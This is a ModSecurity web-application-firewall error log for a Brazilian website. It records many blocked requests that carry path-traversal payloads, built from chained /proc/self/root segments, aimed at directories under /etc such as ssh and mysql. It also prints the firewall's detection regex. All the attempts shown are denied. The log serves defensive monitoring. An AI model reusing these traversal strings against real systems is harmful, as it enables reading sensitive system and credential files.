[Mon Mar 16 13:46:03.506393 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:52142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzy46lpbStxTqkSktyQQAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:37.895916 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:51128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz7aTCbgAP5jq5TegwWQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:39.253504 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.243.203:55766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz76QpVkWug9HeOt87CwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:40.458955 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:41286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz8NSswJuvopo3lOhkjAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:41.795269 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.243.203:41294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz8aQpVkWug9HeOt87DAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:43.862955 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:51560] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz89SswJuvopo3lOhkkAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:44.094135 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:41300] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz9NSswJuvopo3lOhkkQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:46.409088 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:41308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz9Y6lpbStxTqkSktyRQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:47.764180 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.243.203:41316] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz96QpVkWug9HeOt87DgAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:49.845013 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:41332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz-dSswJuvopo3lOhkkgAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:53.421356 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:50704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz_XjZBu2q05ozVU9duAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:54.771222 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.243.203:50712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgz_qTCbgAP5jq5TegwWwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:56.132005 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:50726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0AKTCbgAP5jq5TegwXAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:57.447621 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:50728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0AdSswJuvopo3lOhklgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:46:58.725186 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:50736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0AnjZBu2q05ozVU9dugAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:00.140830 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:50748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0BNSswJuvopo3lOhklwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:02.603786 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.243.203:54980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0BqTCbgAP5jq5TegwYAAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:03.914077 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:54996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0B9SswJuvopo3lOhkmQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:04.535897 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.228.16:53338] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg0CI6lpbStxTqkSktySAAAAk4"]
[Mon Mar 16 13:47:05.276913 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:54998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0CY6lpbStxTqkSktySQAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:07.954892 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:55000] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0CrysWC90G-1nBrBJ9AAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:10.312347 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:55012] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0DXjZBu2q05ozVU9dvQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
